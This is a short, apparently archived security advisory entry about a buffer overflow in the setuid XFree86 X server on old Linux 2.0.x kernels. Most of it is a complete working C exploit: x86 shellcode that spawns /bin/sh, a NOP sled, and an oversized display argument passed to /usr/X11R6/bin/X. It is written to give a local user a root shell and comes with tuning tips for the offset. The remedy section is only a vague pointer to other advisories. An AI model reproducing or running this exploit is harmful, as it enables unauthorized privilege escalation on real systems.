COMMAND

    X (XFree Server)

SYSTEMS AFFECTED

    Linux (Slackware?) 2.2.29-2.0.33 (at least)

PROBLEM

    Thanks to  Dejan Dinic  for posting  me this  one.   It is  buffer
    overflow exploit in XFree86.  Exploit follows:

    /*  XFree86 Server exploit for Intel x86
        Tested on Linux 2.0.29 & 2.0.33 */

    /* Try 2 3 4 5 for OFFSET */

    #define OFFSET 2

    #include <string.h>
    #include <unistd.h>
    #include <errno.h>

    #define LENCODE ( sizeof( Code ) )
    char Code[] =
        "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
        "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
        "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
        "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
        "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";

    char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1;
    char *args[] = { "X", "-nolock", Display, NULL };

    main() {
      printf("You have now RooT shell");
      dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
      __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
      memcpy( ptr + 4, ptr, 0x3fc );
      memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE );
      memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );
      execve( "/usr/X11R6/bin/X", args, args + 3 );
      perror( "execve" );
    }

SOLUTION

    Alot has been said  about suid XFree Server  till now so I  advise
    you to follow dvisories before regarding this and XFree page where
    you'll be able to find most up-to-date informations.